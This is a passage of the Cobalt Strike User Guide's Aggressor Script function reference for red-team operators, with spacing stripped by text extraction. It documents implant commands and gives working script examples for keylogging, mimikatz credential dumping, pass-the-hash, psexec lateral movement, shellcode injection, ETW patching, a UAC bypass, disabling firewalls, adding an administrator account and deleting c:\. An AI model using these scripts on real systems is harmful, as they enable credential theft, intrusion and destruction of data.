+$1-theidforthebeacon.ThismaybeanarrayorasingleID.
+$2-thetechniquetouse
+$3-theremotetarget
+$4-thelistenertospawn
+Example
+# winrm [target] [listener]
+alias winrm {
+bjump($1, "winrm", $2, $3);
+}
+Seealso
+&beacon_remote_exploit_describe,&beacon_remote_exploit_register,&beacon_remote_exploits
+bkerberos_ccache_use
+AskbeacontoinjectaUNIXkerberosccachefileintotheuser'skerberostray
+Arguments
+$1-theidforthebeacon.ThismaybeanarrayorasingleID.
+$2-thelocalpaththeccachefile
+Example
+alias kerberos_ccache_use {
+bkerberos_ccache_use($1, $2);
+}
+CobaltStrikeUserGuide www.fortra.com page:305
+
+AggressorScript/Functions
+bkerberos_ticket_purge
+Askbeacontopurgeticketsfromtheuser'skerberostray
+Arguments
+$1-theidforthebeacon.ThismaybeanarrayorasingleID.
+Example
+alias kerberos_ticket_purge {
+bkerberos_ticket_purge($1);
+}
+bkerberos_ticket_use
+Askbeacontoinjectamimikatzkirbifileintotheuser'skerberostray
+Arguments
+$1-theidforthebeacon.ThismaybeanarrayorasingleID.
+$2-thelocalpaththekirbifile
+Example
+alias kerberos_ticket_use {
+bkerberos_ticket_use($1, $2);
+}
+bkeylogger
+Injectsakeystrokeloggerintoaprocess.
+Arguments
+$1-theidforthebeacon.ThismaybeanarrayorasingleID.
+$2-(optional)thePIDtoinjectthekeystrokeloggerintoor$null.
+$3-(optional)thearchitectureofthetargetPID(x86|x64)or$null.
+CobaltStrikeUserGuide www.fortra.com page:306
+
+AggressorScript/Functions
+Example
+Spawnatemporaryprocess
+bkeylogger($1);
+Injectintothespecifiedprocess
+bkeylogger($1, 1234, "x64");
+bkill
+AskBeacontokillaprocess
+Arguments
+$1-theidforthebeacon.ThismaybeanarrayorasingleID.
+$2-thePIDtokill
+Example
+bkill($1, 1234);
+blink
+AskBeacontolinktoahostoveranamedpipe
+Arguments
+$1-theidforthebeacon.ThismaybeanarrayorasingleID.
+$2-thetargettolinkto
+$3-(optional)thepipenametouse.ThedefaultpipenameintheMalleableC2profileisthe
+defaultotherwise.
+Note
+CobaltStrikeUserGuide www.fortra.com page:307
+
+AggressorScript/Functions
+Use&beacon_linkifyouwantascriptfunctionthatwillconnectorlinkbasedonalistener
+configuration.
+Example
+blink($1, "DC");
+blog
+PublishesanoutputmessagetotheBeacontranscript.
+Arguments
+$1-theidforthebeacontopostto
+$2-thetexttopost
+Example
+alias demo {
+blog($1, "I am output for the blog function");
+}
+blog2
+PublishesanoutputmessagetotheBeacontranscript.Thisfunctionhasanalternateformat
+from&blog
+Arguments
+$1-theidforthebeacontopostto
+$2-thetexttopost
+Example
+alias demo2 {
+blog2($1, "I am output for the blog2 function");
+}
+CobaltStrikeUserGuide www.fortra.com page:308
+
+AggressorScript/Functions
+bloginuser
+AskBeacontocreateatokenfromthespecifiedcredentials.Thisisthemake_tokencommand.
+Arguments
+$1-theidforthebeacon.ThismaybeanarrayorasingleID.
+$2-thedomainoftheuser
+$3-theuser'susername
+$4-theuser'spassword
+Example
+# make a token for a user with an empty password
+alias make_token_empty {
+local('$domain $user');
+($domain, $user) = split("\\\\", $2);
+bloginuser($1, $domain, $user, "");
+}
+blogonpasswords
+AskBeacontodumpin-memorycredentialswithmimikatz.Thisfunctionrequiresadministrator
+privileges.
+Arguments
+$1-theidforthebeacon.ThismaybeanarrayorasingleID.
+$2 -(optional)thePIDtoinjectthelogonpasswordscommandintoor$null
+$3 -(optional)thearchitectureofthetargetPID(x86|x64)or$null
+Example
+Spawnatemporaryprocess
+CobaltStrikeUserGuide www.fortra.com page:309
+
+AggressorScript/Functions
+item "Dump &Passwords" {
+binput($1, "logonpasswords");
+blogonpasswords($1);
+}
+Injectintothespecifiedprocess
+beacon_command_register(
+"logonpasswords_inject",
+"Inject into a process and dump in-memory credentials with mimikatz",
+"Usage: logonpasswords_inject [pid] [arch]");
+alias logonpasswords_inject {
+blogonpasswords($1, $2, $3);
+}
+bls
+TaskaBeacontolistfiles
+Variations
+bls($1, "folder");
+OutputtheresultstotheBeaconconsole.
+bls($1, "folder", &callback);
+Routeresultstothespecifiedcallbackfunction.
+Arguments
+$1-theidforthebeacon.ThismaybeanarrayorasingleID.
+$2-(optional)thefoldertolistfilesfor.Use"."forthecurrentfolder.
+$3-(optional)callbackfunctionwiththelsresults.Argumentstothecallbackare:$1=beacon
+ID,$2=thefolder,$3=results
+Example
+CobaltStrikeUserGuide www.fortra.com page:310
+
+AggressorScript/Functions
+on beacon_initial {
+bls($1, ".");
+}
+bmimikatz
+AskBeacontorunamimikatzcommand.
+Arguments
+$1-theidforthebeacon.ThismaybeanarrayorasingleID.
+$2-thecommandandargumentstorun.Supportsthesemicolon( ;)charactertoseparate
+multiplecommands
+$3-(optional)thePIDtoinjectthemimikatzcommandintoor$null
+$4-(optional)thearchitectureofthetargetPID(x86|x64)or$null
+$5-(optional)callbackfunctionwiththeresults.Argumentstothecallbackare:$1=beaconID,
+$2=results,$3=informationmap
+Examples
+# Usage: coffee [pid] [arch]
+alias coffee {
+if ($2 >= 0 && ($3 eq "x86" || $3 eq "x64")) {
+bmimikatz($1, "standard::coffee", $2, $3);
+} else {
+bmimikatz($1, "standard::coffee");
+}
+}
+alias double_espresso {
+bmimikatz($1, "standard::coffee;standard::coffee");
+}
+bmimikatz_small
+UseCobaltStrike's"smaller"internalbuildofMimikatztoexecuteamimikatzcommand.
+Arguments
+CobaltStrikeUserGuide www.fortra.com page:311
+
+AggressorScript/Functions
+$1-theidforthebeacon.ThismaybeanarrayorasingleID.
+$2-thecommandandargumentstorun.Supportsthesemicolon( ;)charactertoseparate
+multiplecommands
+$3 -(optional)thePIDtoinjectthemimikatzcommandintoor$null
+$4 -(optional)thearchitectureofthetargetPID(x86|x64)or$null
+$5-(optional)callbackfunctionwiththeresults.Argumentstothecallbackare:$1=beaconID,
+$2=results,$3=informationmap
+Note
+Thismimikatzbuildsupports:
+* kerberos::golden
+* lsadump::dcsync
+* sekurlsa::logonpasswords
+* sekurlsa::pth
+Alloftheotherstuffisremovedforsize.Use&bmimikatzifyouwanttobringthefullpowerof
+mimikatztosomeotheroffenseproblem.
+Example
+# Usage: logonpasswords_elevate [pid] [arch]
+alias logonpasswords_elevate {
+if ($2 >= 0 && ($3 eq "x86" || $3 eq "x64")) {
+bmimikatz_small($1, "!sekurlsa::logonpasswords", $2, $3);
+} else {
+bmimikatz_small($1, "!sekurlsa::logonpasswords");
+}
+}
+bmkdir
+AskBeacontomakeadirectory
+Arguments
+$1-theidforthebeacon.ThismaybeanarrayorasingleID.
+CobaltStrikeUserGuide www.fortra.com page:312
+
+AggressorScript/Functions
+$2-thefoldertocreate
+Example
+bmkdir($1, "you are owned");
+bmode
+ChangethedatachannelforaDNSBeacon.
+Arguments
+$1-theidforthebeacon.ThismaybeanarrayorasingleID.
+$2-thedatachannel(e.g.,dns,dns6,ordns-txt)
+Example
+item "Mode DNS-TXT" {
+binput($1, "mode dns-txt");
+bmode($1, "dns-txt");
+}
+bmv
+AskBeacontomoveafileorfolder.
+Arguments
+$1-theidforthebeacon.ThismaybeanarrayorasingleID.
+$2-thefileorfoldertomove
+$3-thedestination
+Example
+bmv($1, "evil.exe", "\\\\target\\\C$\\evil.exe");
+bnet
+CobaltStrikeUserGuide www.fortra.com page:313
+
+AggressorScript/Functions
+RunacommandfromBeacon'snetworkandhostenumerationtool.
+Arguments
+$1-theidforthebeacon.ThismaybeanarrayorasingleID.
+$2-thecommandtorun.
+Type Description
+computers listshostsinadomain(groups)
+dclist listsdomaincontrollers
+domain showthecurrentdomain
+domain_controllers listdomaincontrollerhostsinadomain(groups)
+domain_trusts listsdomaintrusts
+group listsgroupsandusersingroups
+localgroup listslocalgroupsandusersinlocalgroups
+logons listsusersloggedontoahost
+sessions listssessionsonahost
+share listssharesonahost
+user listsusersanduserinformation
+time showtimeforahost
+view listshostsinadomain(browserservice)
+$3-thetargettorunthiscommandagainstor$null
+$4-theparametertothiscommand(e.g.,agroupname)
+$5-(optional)thePIDtoinjectthenetworkandhostenumerationtoolintoor$null
+$6-(optional)thearchitectureofthetargetPID(x86|x64)or$null
+$7-(optional)callbackfunctionwiththeresults.Argumentstothecallbackare:$1=beaconID,
+$2=results,$3=informationmap
+NOTE:
+ThedomaincommandexecutesaBOFusinginline_executeandwillnotspawnorinject
+intoaprocess
+CobaltStrikeUserGuide www.fortra.com page:314
+
+AggressorScript/Functions
+Example
+Spawnatemporaryprocess
+# ladmins [target]
+# find the local admins for a target
+alias ladmins {
+bnet($1, "localgroup", $2, "administrators");
+}
+Injectintothespecifiedprocess
+# ladmins [pid] [arch] [target]
+# find the local admins for a target
+alias ladmins {
+bnet($1, "localgroup", $4, "administrators", $2, $3);
+}
+bnote
+AssignanotetothespecifiedBeacon.
+Arguments
+$1-theidforthebeacontopostto
+$2-thenotecontent
+Example
+bnote($1, "foo");
+bof_extract
+Thisfunctionextractstheexecutablecodefromthebeaconobjectfile.
+Arguments
+$1-Astringcontainingthebeaconobjectfile
+CobaltStrikeUserGuide www.fortra.com page:315
+
+AggressorScript/Functions
+Example
+$handle = openf(script_resource("/object_file"));
+$data = readb($handle, -1);
+closef($handle);
+return bof_extract($data);
+bof_pack
+Packargumentsinawaythat'ssuitableforBOFAPIstounpack.
+Arguments
+$1-theidfortheBeacon(neededforunicodeconversions)
+$2-formatstringforthepackeddata
+...-oneargumentperiteminourformatstring
+Note
+Thisfunctionpacksitsargumentsintoabinarystructureforusewith&beacon_inline_execute.
+TheformatstringoptionsherecorrespondtotheBeaconData*CAPIavailabletoBOFfiles.This
+APIhandlestransformationsonthedataandhintsasrequiredbyeachtypeitcanpack.
+Type Description Unpack With (C)
+b binarydata BeaconDataExtract
+i 4-byteinteger BeaconDataInt
+s 2-byteshortinteger BeaconDataShort
+z zero-terminated+encodedstring BeaconDataExtract
+Z zero-terminatedwide-charstring (wchar_t*)BeaconDataExtract
+TheCobaltStrikedocumentationhasapagespecifictoBOFfiles.SeeBeacon Object Files on
+page 171.
+Seealso
+&beacon_inline_execute
+CobaltStrikeUserGuide www.fortra.com page:316
+
+AggressorScript/Functions
+bpassthehash
+AskBeacontocreateatokenthatpassesthespecifiedhash.Thisisthepthcommandin
+Beacon.Itusesmimikatz.Thisfunctionrequiresadministratorprivileges.
+Arguments
+$1-theidforthebeacon.ThismaybeanarrayorasingleID.
+$2-thedomainoftheuser
+$3-theuser'susername
+$4-theuser'spasswordhash
+$5 -(optional)thePIDtoinjectthepthcommandintoor$null
+$6 -(optional)thearchitectureofthetargetPID(x86|x64)or$null
+Example
+Spawnatemporaryprocess
+bpassthehash($1, "CORP", "Administrator", "password_hash");
+Injectintothespecifiedprocess
+bpassthehash($1, "CORP", "Administrator", "password_hash", 1234, "x64");
+bpause
+AskBeacontopauseitsexecution.Thisisaone-offsleep.
+Arguments
+$1-theidforthebeacon.ThismaybeanarrayorasingleID.
+$2-howlongtheBeaconshouldpauseexecutionfor(milliseconds)
+Example
+CobaltStrikeUserGuide www.fortra.com page:317
+
+AggressorScript/Functions
+alias pause {
+bpause($1, int($2));
+}
+bportscan
+AskBeacontorunitsportscanner.
+Arguments
+$1-theidforthebeacon.ThismaybeanarrayorasingleID.
+$2-thetargetstoscan(e.g.,192.168.12.0/24)
+$3-theportstoscan(e.g.,1-1024,6667)
+$4-thediscoverymethodtouse(arp|icmp|none)
+$5-themaxnumberofsocketstouse(e.g.,1024)
+$6 -(optional)thePIDtoinjecttheportscannerintoor$null
+$7 -(optional)thearchitectureofthetargetPID(x86|x64)or$null
+$8-(optional)callbackfunctionwiththeresults.Argumentstothecallbackare:$1=beaconID,
+$2=results,$3=informationmap
+Example
+Spawnatemporaryprocess
+bportscan($1, "192.168.12.0/24", "1-1024,6667", "arp", 1024);
+Injectintothespecifiedprocess
+bportscan($1, "192.168.12.0/24", "1-1024,6667", "arp", 1024, 1234, "x64");
+bpowerpick
+Spawnaprocess,injectUnmanagedPowerShell,andrunthespecifiedcommand.
+CobaltStrikeUserGuide www.fortra.com page:318
+
+AggressorScript/Functions
+Arguments
+$1-theidforthebeacon.ThismaybeanarrayorasingleID.
+$2-thecmdletandarguments
+$3-(optional)ifspecified,powershell-importscriptisignoredandthisargumentistreatedas
+thedownloadcradletoprependtothecommand.EmptystringisOKheretoo,fornodownload
+cradle.Specify$nulltousethecurrentimportedPowerShellscript.
+$4-(optional)the"PATCHES:"argumentcanmodifyfunctionsinmemoryfortheprocess.Upto
+4"patch-rule"rulescanbespecified(spacedelimited).
+$5-(optional)callbackfunctionwiththeresults.Argumentstothecallbackare:$1=beaconID,
+$2=results,$3=informationmap
+"patch-rule" syntax (comma delimited): [library],[function],[offset],[hex-
+patch-value]
+library -1-260characters
+function -1-256characters
+offset -0-65535(Theoffsetfromthestartoftheexecutablefunction)
+hex-patch-value-2-200hexcharacters(0-9,A-F).Lengthmustbeevennumber(hex
+pairs).
+Example
+# get the version of PowerShell available via Unmanaged PowerShell
+alias powerver {
+bpowerpick($1, '$PSVersionTable.PSVersion');
+}
+alias powerver2 {
+bpowerpick($1, '$PSVersionTable.PSVersion', '', 'PATCHES:
+ntdll.dll,EtwEventWrite,0,C300');
+}
+bpowershell
+AskBeacontorunaPowerShellcmdlet
+Arguments
+$1-theidforthebeacon.ThismaybeanarrayorasingleID.
+CobaltStrikeUserGuide www.fortra.com page:319
+
+AggressorScript/Functions
+$2-thecmdletandarguments
+$3-(optional)ifspecified,powershell-importscriptisignoredandthisargumentistreatedas
+thedownloadcradletoprependtothecommand.EmptystringisOKheretoo,fornodownload
+cradle.Specify$nulltousethecurrentimportedPowerShellscript.
+$4-(optional)callbackfunctionwiththeresults.Argumentstothecallbackare:$1=beaconID,
+$2=results,$3=informationmap
+Example
+# get the version of PowerShell...
+alias powerver {
+bpowershell($1, '$PSVersionTable.PSVersion');
+}
+bpowershell_import
+ImportaPowerShellscriptintoaBeacon
+Arguments
+$1-theidforthebeacon.ThismaybeanarrayorasingleID.
+$2-thepathtothelocalfiletoimport
+Example
+# quickly run PowerUp
+alias powerup {
+bpowershell_import($1, script_resource("PowerUp.ps1"));
+bpowershell($1, "Invoke-AllChecks");
+}
+bpowershell_import_clear
+CleartheimportedPowerShellscriptfromaBeaconsession.
+Arguments
+$1-theidforthebeacon.ThismaybeanarrayorasingleID.
+CobaltStrikeUserGuide www.fortra.com page:320
+
+AggressorScript/Functions
+Example
+alias powershell-clear {
+bpowershell_import_clear($1);
+}
+bppid
+SetaparentprocessforBeacon'schildprocesses
+Arguments
+$1-theidforthebeacon.ThismaybeanarrayorasingleID.
+$2-theparentprocessID.Specify0toresettodefaultbehavior.
+Notes
+l Thecurrentsessionmusthaverightstoaccessthespecifiedparentprocess.
+l Attemptstospawnpost-exjobsunderparentprocessesinanotherdesktopsession
+mayfail.ThislimitationisduetohowBeaconlaunchesits"temporary"processesfor
+post-exploitationjobsandinjectscodeintothem.
+Example
+alias prepenv {
+btask($1, "Tasked Beacon to find explorer.exe and make it the PPID");
+bps($1, {
+local('$pid $name $entry');
+foreach $entry (split("\n", $2)) {
+($name, $null, $pid) = split("\\s+", $entry);
+if ($name eq "explorer.exe") {
+bppid($1, $pid);
+}
+}
+});
+}
+bprintscreen
+AskBeacontotakeascreenshotviaPrintScrmethod.
+CobaltStrikeUserGuide www.fortra.com page:321
+
+AggressorScript/Functions
+Arguments
+$1-theidforthebeacon.ThismaybeanarrayorasingleID.
+$2-(optional)thePIDtoinjectthescreenshottoolviaPrintScrmethodor$null.
+$3-(optional)thearchitectureofthetargetPID(x86|x64)or$null.
+Example
+Spawnatemporaryprocess
+item "&Printscreen" {
+binput($1, "printscreen");
+bpintscreen($1);
+}
+Injectintothespecifiedprocess
+bprintscreen($1, 1234, "x64");
+bps
+TaskaBeacontolistprocesses
+Variations
+bps($1);
+OutputtheresultstotheBeaconconsole.
+bps($1, &callback);
+Routeresultstothespecifiedcallbackfunction.
+Arguments
+$1-theidforthebeacon.ThismaybeanarrayorasingleID.
+CobaltStrikeUserGuide www.fortra.com page:322
+
+AggressorScript/Functions
+$2-(optional)callbackfunctionwiththepsresults.Argumentstothecallbackare:$1=beacon
+ID,$2=results
+Example
+on beacon_initial {
+bps($1);
+}
+alias prepenv {
+btask($1, "Tasked Beacon to find explorer.exe and make it the PPID");
+bps($1, {
+local('$pid $name $entry');
+foreach $entry (split("\n", $2)) {
+($name, $null, $pid) = split("\\s+", $entry);
+if ($name eq "explorer.exe") {
+bppid($1, $pid);
+}
+}
+});
+}
+bpsexec
+AskBeacontospawnapayloadonaremotehost.ThisfunctiongeneratesanArtifactKit
+executable,copiesittothetarget,andcreatesaservicetorunitandcleanitup.
+Arguments
+$1-theidforthebeacon.ThismaybeanarrayorasingleID.
+$2-thetargettospawnapayloadonto
+$3-thelistenertospawn
+$4-thesharetocopytheexecutableto
+$5-thearchitectureofthepayloadtogenerate/deliver(x86orx64)
+Example
+CobaltStrikeUserGuide www.fortra.com page:323
+
+AggressorScript/Functions
+brev2self();
+bloginuser($1, "CORP", "Administrator", "toor");
+bpsexec($1, "172.16.48.3", "my listener", "ADMIN\$");
+bpsexec_command
+AskBeacontorunacommandonaremotehost.Thisfunctioncreatesaserviceontheremote
+host,startsit,andcleansitup.
+Arguments
+$1-theidforthebeacon.ThismaybeanarrayorasingleID.
+$2-thetargettorunthecommandon
+$3-thenameoftheservicetocreate
+$4-thecommandtorun.
+Example
+# disable the firewall on a remote target
+# beacon> shieldsdown [target]
+alias shieldsdown {
+bpsexec_command($1, $2, "shieldsdn", "cmd.exe /c netsh advfirewall set
+allprofiles state off");
+}
+bpsexec_psh
+REMOVED Removed in Cobalt Strike 4.0. Use &bjump with psexec_psh option.
+bpsinject
+InjectUnmanagedPowerShellintoaspecificprocessandrunthespecifiedcmdlet.Thiswilluse
+thecurrentimportedpowershellscript.
+Arguments
+$1-theidforthebeacon.ThismaybeanarrayorasingleID.
+$2-theprocesstoinjectthesessioninto
+CobaltStrikeUserGuide www.fortra.com page:324
+
+AggressorScript/Functions
+$3-theprocessarchitecture(x86|x64)
+$4-thecmdlettorun
+$5-(optional)callbackfunctionwiththeresults.Argumentstothecallbackare:$1=beaconID,
+$2=results,$3=informationmap
+Example
+bpsinject($1, 1234, x64, "[System.Diagnostics.Process]::GetCurrentProcess()");
+bpwd
+AskBeacontoprintitscurrentworkingdirectory
+Arguments
+$1-theidforthebeacon.ThismaybeanarrayorasingleID.
+Example
+alias pwd {
+bpwd($1);
+}
+breg_query
+AskBeacontoqueryakeywithintheregistry.
+Arguments
+$1-theidforthebeacon.ThismaybeanarrayorasingleID.
+$2-thepathtothekey
+$3-x86|x64-whichviewoftheregistrytouse
+Example
+alias typedurls {
+breg_query($1, "HKCU\\Software\\Microsoft\\Internet Explorer\\TypedURLs",
+CobaltStrikeUserGuide www.fortra.com page:325
+
+AggressorScript/Functions
+"x86");
+}
+breg_queryv
+AskBeacontoqueryavaluewithinaregistrykey.
+Arguments
+$1-theidforthebeacon.ThismaybeanarrayorasingleID.
+$2-thepathtothekey
+$3-thenameofthevaluetoquery
+$4-x86|x64-whichviewoftheregistrytouse
+Example
+alias winver {
+breg_queryv($1, "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion",
+"ProductName", "x86");
+}
+bremote_exec
+AskBeacontorunacommandonaremotetarget.
+Arguments
+$1-theidforthebeacon.ThismaybeanarrayorasingleID.
+$2-theremoteexecutemethodtouse
+$3-theremotetarget
+$4-thecommandandargumentstorun
+Example
+# winrm [target] [command+args]
+alias winrm-exec {
+CobaltStrikeUserGuide www.fortra.com page:326
+
+AggressorScript/Functions
+bremote_exec($1, "winrm", $2, $3); {
+}
+Seealso
+&beacon_remote_exec_method_describe,&beacon_remote_exec_method_register,&beacon_
+remote_exec_methods
+brev2self
+AskBeacontodropitscurrenttoken.ThiscallstheRevertToSelf()Win32API.
+Arguments
+$1-theidforthebeacon.ThismaybeanarrayorasingleID.
+Example
+alias rev2self {
+brev2self($1);
+}
+brm
+AskBeacontoremoveafileorfolder.
+Arguments
+$1-theidforthebeacon.ThismaybeanarrayorasingleID.
+$2-thefileorfoldertoremove
+Example
+# nuke the system
+brm($1, "c:\\");
+brportfwd
+AskBeacontosetupareverseportforward.
+CobaltStrikeUserGuide www.fortra.com page:327
+
+AggressorScript/Functions
+Arguments
+$1-theidforthebeacon.ThismaybeanarrayorasingleID.
+$2-theporttobindtoonthetarget
+$3-thehosttoforwardconnectionsto
+$4-theporttoforwardconnectionsto
+Example
+brportfwd($1, 80, "192.168.12.88", 80);
+brportfwd_local
+AskBeacontosetupareverseportforwardthatroutestothecurrentCobaltStrikeclient.
+Arguments
+$1-theidforthebeacon.ThismaybeanarrayorasingleID.
+$2-theporttobindtoonthetarget
+$3-thehosttoforwardconnectionsto
+$4-theporttoforwardconnectionsto
+Example
+brportfwd_local($1, 80, "192.168.12.88", 80);
+brportfwd_stop
+AskBeacontostopareverseportforward
+Arguments
+$1-theidforthebeacon.ThismaybeanarrayorasingleID.
+$2-theportboundonthetarget
+CobaltStrikeUserGuide www.fortra.com page:328
+
+AggressorScript/Functions
+Example
+brportfwd_stop($1, 80);
+brun
+AskBeacontorunacommand
+Arguments
+$1-theidforthebeacon.ThismaybeanarrayorasingleID.
+$2-thecommandandargumentstorun
+Note
+Thiscapabilityisasimplerversionofthe&beacon_execute_jobfunction.Thelatterfunctionis
+what&bpowershelland&bshellbuildon.Thisisa(slightly)moreOPSEC-safeoptiontorun
+commandsandreceiveoutputfromthem.
+Example
+alias w {
+brun($1, "whoami /all");
+}
+brunas
+AskBeacontorunacommandasanotheruser.
+Arguments
+$1-theidforthebeacon.ThismaybeanarrayorasingleID.
+$2-thedomainoftheuser
+$3-theuser'susername
+$4-theuser'spassword
+$5-thecommandtorun
+CobaltStrikeUserGuide www.fortra.com page:329
+
+AggressorScript/Functions
+Example
+brunas($1, "CORP", "Administrator", "toor", "notepad.exe");
+brunasadmin
+REMOVED Removed in Cobalt Strike 4.0. Use &belevate_command with psexec_psh
+option.
+AskBeacontorunacommandinahigh-integritycontext(bypassesUAC).
+Arguments
+$1-theidforthebeacon.ThismaybeanarrayorasingleID.
+$2-thecommandanditsarguments.
+Notes
+ThiscommandusestheTokenDuplicationUACbypass.Thisbypasshasafewrequirements:
+l Yourusermustbealocaladmin
+l IfAlways Notifyisenabled,anexistinghighintegrityprocessmustberunninginthe
+currentdesktopsession.
+Example
+# disable the firewall
+brunasadmin($1, "cmd.exe /C netsh advfirewall set allprofiles state off");
+brunu
+AskBeacontorunaprocessunderanotherprocess.
+Arguments
+$1-theidforthebeacon.ThismaybeanarrayorasingleID.
+$2-thePIDoftheparentprocess
+$3-thecommand+argumentstorun
+CobaltStrikeUserGuide www.fortra.com page:330
+
+AggressorScript/Functions
+Example
+brunu($1, 1234, "notepad.exe");
+bscreenshot
+AskBeacontotakeascreenshot.
+Arguments
+$1-theidforthebeacon.ThismaybeanarrayorasingleID.
+$2-(optional)thePIDtoinjectthescreenshottoolor$null
+$3-(optional)thearchitectureofthetargetPID(x86|x64)or$null
+Example
+Spawnatemporaryprocess
+item "&Screenshot" {
+binput($1, "screenshot");
+bscreenshot($1);
+}
+Injectintothespecifiedprocess
+bscreenshot($1, 1234, "x64");
+bscreenwatch
+AskBeacontotakeperiodicscreenshots
+Arguments
+$1-theidforthebeacon.ThismaybeanarrayorasingleID.
+$2-(optional)thePIDtoinjectthescreenshottoolor$null
+CobaltStrikeUserGuide www.fortra.com page:331
+
+AggressorScript/Functions
+$3-(optional)thearchitectureofthetargetPID(x86|x64)or$null
+Example
+Spawnatemporaryprocess
+item "&Screenwatch" {
+binput($1, "screenwatch");
+bscreenwatch($1);
+}
+Injectintothespecifiedprocess
+bscreenwatch($1, 1234, "x64");
+bsetenv
+AskBeacontosetanenvironmentvariable
+Arguments
+$1-theidforthebeacon.ThismaybeanarrayorasingleID.
+$2-theenvironmentvariabletoset
+$3-thevaluetosettheenvironmentvariableto(specify$nulltounsetthevariable)
+Example
+alias tryit {
+bsetenv($1, "foo", "BAR!");
+bshell($1, "echo %foo%");
+}
+bshell
+AskBeacontorunacommandwithcmd.exe
+Arguments
+CobaltStrikeUserGuide www.fortra.com page:332
+
+AggressorScript/Functions
+$1-theidforthebeacon.ThismaybeanarrayorasingleID.
+$2-thecommandandargumentstorun
+Example
+alias adduser {
+bshell($1, "net user $2 B00gyW00gy1234! /ADD");
+bshell($1, "net localgroup \"Administrators\" $2 /ADD");
+}
+bshinject
+Injectshellcode(fromalocalfile)intoaspecificprocess
+Arguments
+$1-theidforthebeacon.ThismaybeanarrayorasingleID.
+$2-thePIDoftheprocesstoinjectinto
+$3-theprocessarchitecture(x86|x64)
+$4-thelocalfilewiththeshellcode
+Example
+bshinject($1, 1234, "x86", "/path/to/stuff.bin");
+bshspawn
+Spawnshellcode(fromalocalfile)intoanotherprocess.ThisfunctionbenefitsfromBeacon's
+configurationtospawnpost-exploitationjobs(e.g.,spawnto,ppid,etc.)
+Arguments
+$1-theidforthebeacon.ThismaybeanarrayorasingleID.
+$2-theprocessarchitecture(x86|x64)
+$3-thelocalfilewiththeshellcode
+CobaltStrikeUserGuide www.fortra.com page:333
+
+AggressorScript/Functions
+Example
+bshspawn($1, "x86", "/path/to/stuff.bin");
+bsleep
+AskBeacontochangeitsbeaconingintervalandjitterfactor.
+Arguments
+$1-theidforthebeacon.ThismaybeanarrayorasingleID.
+$2-thenumberofsecondsbetweenbeacons.
+$3-thejitterfactor[0-99]
+Example
+alias stealthy {
+# sleep for 1 hour with 30% jitter factor
+bsleep($1, 60 * 60, 30);
+}
+bsleepu
+AskBeacontochangeitsbeaconingintervalandjitterfactor.
+Arguments
+$1-theidforthebeacon.ThismaybeanarrayorasingleID.
+$2-beaconsleepperiodstring.
+Thebeaconsleepperiodstringtakestheformat:ud vh xm ys zj
+Were:
+wisthenumberofdays
+visthenumberofhours
+xisthenumberofminutes
+CobaltStrikeUserGuide www.fortra.com page:334
+
+AggressorScript/Functions
+yisthenumberofseconds
+zisthejitterfactor[0-99]
+Example
+alias stealthy {
+# sleep for 2 days 13 hours 45 minutes 8 seconds with 30% jitter factor
+bsleepu($1, "2d 13h 45m 8s 30j");
+}
+bsocks
+StartaSOCKSproxyserverassociatedwithabeacon.
+Arguments
+$1-theidforthebeacon.ThismaybeanarrayorasingleID.
+$2-theporttobindto
+$3-SOCKSversion[SOCKS4|SOCKS5]Default:SOCKS4
+ForSOCKS5only:
+$4-enable/disableNoAuthauthentication[enableNoAuth|disableNoAuth]Default:
+enableNoAuth
+$5-usernameforUser/Passwordauthentication[blank|username]Default:Blank
+$6-passwordforUser/Passwordauthentication[blank|password]Default:Blank
+$7-enablelogging[enableLogging|disableLogging]Default:disableLogging
+Example
+alias socksPorts {
+bsocks($1, 10401);
+bsocks($1, 10402, "SOCKS4");
+bsocks($1, 10501, "SOCKS5");
+bsocks($1, 10502, "SOCKS5" "enableNoAuth", "", "",
+"disableLogging");
+bsocks($1, 10503, "SOCKS5" "enableNoAuth", "myname",
+CobaltStrikeUserGuide www.fortra.com page:335
+
+AggressorScript/Functions
+"mypassword", "disableLogging");
+bsocks($1, 10504, "SOCKS5" "disableNoAuth", "myname",
+"mypassword", "enableLogging");
+}
+bsocks_stop
+StopSOCKSproxyserversassociatedwiththespecifiedBeacon.
+Arguments
+$1-theidforthebeacon.ThismaybeanarrayorasingleID.
+Example
+alias stopsocks {
+bsocks_stop($1);
+}
+bspawn
+AskBeacontospawnanewsession
+Arguments
+$1-theidforthebeacon.ThismaybeanarrayorasingleID.
+$2-thelistenertotarget.
+$3-thearchitecturetospawnaprocessfor(defaultstocurrentbeaconarch)
+Example
+item "&Spawn" {
+openPayloadHelper(lambda({
+binput($bids, "spawn x86 $1");
+bspawn($bids, $1, "x86");
+}, $bids => $1));
+}
+bspawnas
+CobaltStrikeUserGuide www.fortra.com page:336
+
+AggressorScript/Functions
+AskBeacontospawnasessionasanotheruser.
+Arguments
+$1-theidforthebeacon.ThismaybeanarrayorasingleID.
+$2-thedomainoftheuser
+$3-theuser'susername
+$4-theuser'spassword
+$5-thelistenertospawn
+Example
+bspawnas($1, "CORP", "Administrator", "toor", "my listener");
+bspawnto
+ChangethedefaultprogramBeaconspawnstoinjectcapabilitiesinto.
+Arguments
+$1-theidforthebeacon.ThismaybeanarrayorasingleID.
+$2-thearchitecturewe'remodifyingthespawntosettingfor(x86,x64)
+$3-theprogramtospawn
+Notes
+Thevalueyouspecifyforspawntomustworkfromx86->x86,x86->x64,x64->x86,andx64->x86
+contexts.Thisistricky.Followtheserulesandyou'llbeOK:
+1.AlwaysspecifythefullpathtotheprogramyouwantBeacontospawnforitspost-exjobs.
+2.Environmentvariables(e.g.,%windir%)areOKwithinthesepaths.
+3.Donotspecify%windir%\system32orc:\windows\system32directly.Alwaysuse
+syswow64(x86)andsysnative(x64).Beaconwilladjustthesevaluestosystem32ifit's
+necessary.
+CobaltStrikeUserGuide www.fortra.com page:337
+
+AggressorScript/Functions
+4.Foranx86spawntovalue,youmustspecifyanx86program.Foranx64spawntovalue,you
+mustspecifyanx64program.
+Example
+# let's make everything lame.
+on beacon_initial {
+binput($1, "prep session with new spawnto values.");
+bspawnto($1, "x86", "%windir%\\syswow64\\notepad.exe");
+bspawnto($1, "x64", "%windir%\\sysnative\\notepad.exe");
+}
+bspawnu
+AskBeacontospawnasessionunderanotherprocess.
+Arguments
+$1-theidforthebeacon.ThismaybeanarrayorasingleID.
+$2-theprocesstospawnthissessionunder
+$3-thelistenertospawn
+Example
+bspawnu($1, 1234, "my listener");
+bspunnel
+SpawnandtunnelanagentthroughthisBeacon(viaatargetlocalhost-onlyreverseport
+forward)
+Arguments
